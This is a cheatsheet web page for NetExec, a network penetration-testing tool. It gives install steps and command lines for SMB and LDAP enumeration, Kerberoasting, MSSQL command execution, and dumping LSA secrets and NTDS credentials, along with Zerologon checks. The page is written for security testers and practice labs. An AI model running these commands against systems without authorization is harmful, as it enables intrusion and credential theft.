NetExec, also known as nxc
, is a powerful network hacking tool designed to automate security assessments of large-scale networks.
It builds upon the legacy of CrackMapExec, offering enhanced functionality for penetration testers, red teamers, and cybersecurity professionals. Below is a detailed cheatsheet to help you utilize NetExec effectively.
To install NetExec:
bashsudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
netexec --version
The general syntax for NetExec commands:
bashnetexec <service> <target> -u <username> -p <password>
Example for SMB:
bashnetexec smb target -u username -p password
netexec smb target -u '' -p ''
netexec smb target -u 'guest' -p ''
netexec smb target -u username -p password -k
netexec smb target
netexec smb target -u username -p password --shares
netexec smb target -u username -p password --users
netexec smb target -u username -p password --groups --users --shares --sessions
netexec smb target -u username -p password --get-file target_file output_file --share sharename
netexec ldap target -u '' -p '' --users
netexec ldap target -u username -p password --kerberoasting hash.txt
netexec mssql target -u username -p password -x command_to_execute
netexec ftp target -u username -p password --ls
netexec smb target -u username -p password --lsa
netexec smb target -u username -p password --ntds
Check for vulnerabilities like Zerologon or PetitPotam:
bashnetexec smb target -u username -p password -M zerologon
netexec smb target -u username -p password -M webdav
netexec ldap target -u username -p password --bloodhound
Explore the official NetExec Wiki and practice labs like HackTheBox’s Mist or Rebound to refine your skills.
This cheatsheet provides a quick reference to NetExec’s core functionalities, enabling efficient network enumeration, exploitation, and post-exploitation tasks.
Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…
MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…
"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…
CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…
The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…
The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…